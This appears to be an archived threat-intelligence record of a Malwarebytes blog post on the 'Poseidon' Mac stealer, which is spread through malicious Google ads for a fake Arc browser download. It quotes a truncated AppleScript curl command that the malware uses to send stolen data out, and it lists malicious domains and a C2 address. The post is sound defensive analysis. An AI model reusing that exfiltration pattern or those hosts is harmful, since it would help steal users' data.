{
	"id": "bc3fd856-cf59-4801-a6f6-9756eebdb556",
	"created_at": "2026-04-06T00:20:13.462185Z",
	"updated_at": "2026-04-10T13:12:12.003251Z",
	"deleted_at": null,
	"sha1_hash": "531984a23b7516401e15e2e500cdc80d27160925",
	"title": "'Poseidon' Mac stealer distributed via Google ads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 702360,
	"plain_text": "'Poseidon' Mac stealer distributed via Google ads\r\nBy Jérôme Segura\r\nPublished: 2024-06-27 · Archived: 2026-04-05 13:01:16 UTC\r\nOn June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for\r\nthe Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure,\r\ncertainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.\r\nThe macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer\r\ncompetitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously\r\ntracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new\r\nproject ‘Poseidon’ and added a few new features such as looting VPN configurations.\r\nIn this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum\r\nannouncement, to the distribution of the new Mac malware via malvertising.\r\nRodrigo4 launches new PR campaign\r\nA threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with\r\nsimilar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel\r\nwith statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities\r\nreminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden,\r\nKeePassXC) stealer, and browser data collector.\r\nIn a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 1 of 6\n\nForum post by Rodrigo4 on XSS\r\nHello everyone, we have released the V4 update and there are quite a lot of new things.\r\nThe very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR\r\nMalware authors do need publicity, but we will try to stick to the facts and what we have observed in active\r\nmalware delivery campaigns.\r\nDistribution via Google ads\r\nWe saw an ad for the Arc browser belonging to ‘Coles \u0026 Co’, linking to the domain name arcthost[.]org:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 2 of 6\n\nMalicious ad for Arc browser via Google search\r\nPeople who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac\r\nonly:\r\nDecoy website for Arc\r\nThe downloaded DMG file resembles what one would expect when installing a new Mac application with the\r\nexception of the right-click to open trick to bypass security protections:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 3 of 6\n\nMalicious Arc DMG installer\r\nConnection to new Poseidon project\r\nThe new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal\r\nVPN configurations from Fortinet and OpenVPN:\r\nExcerpt from forum post featuring new VPN capability\r\nMore interesting is the data exfiltration which is revealed in the following command:\r\nset result_send to (do shell script \\\"curl -X POST -H \\\\\\\"uuid: 399122bdb9844f7d934631745e22bd06\\\\\\\"\r\nNavigating to this IP address reveals the new Poseidon branded panel:\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 4 of 6\n\nPoseidon panel login page\r\nConclusion\r\nThere is an active scene for Mac malware development focused on stealers. As we can see in this post, there are\r\nmany contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that\r\ntheir product is feature-rich and has low detection from antivirus software.\r\nSeeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new\r\nvictims. Staying protected against these threats requires vigilance any time you download and install a new app.\r\nMalwarebytes for Mac will keep detecting this ‘Poseidon campaign as OSX.RodStealer and we have already\r\nshared information related to the malicious ad with Google. We highly recommend using web protection that\r\nblocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both\r\neffectively.\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 5 of 6\n\nIndicators of Compromise\r\nGoogle ad domain\r\narcthost[.]org\r\nDecoy site\r\narc-download[.]com\r\nDownload URL\r\nzestyahhdog[.]com/Arc12645413[.]dmg\r\nPayload SHA256\r\nc1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05\r\nC2\r\n79.137.192[.]4/p2p\r\nSource: https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nhttps://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads"
	],
	"report_names": [
		"poseidon-mac-stealer-distributed-via-google-ads"
	],
	"threat_actors": [],
	"ts_created_at": 1775434813,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/531984a23b7516401e15e2e500cdc80d27160925.pdf",
		"text": "https://archive.orkl.eu/531984a23b7516401e15e2e500cdc80d27160925.txt",
		"img": "https://archive.orkl.eu/531984a23b7516401e15e2e500cdc80d27160925.jpg"
	}
}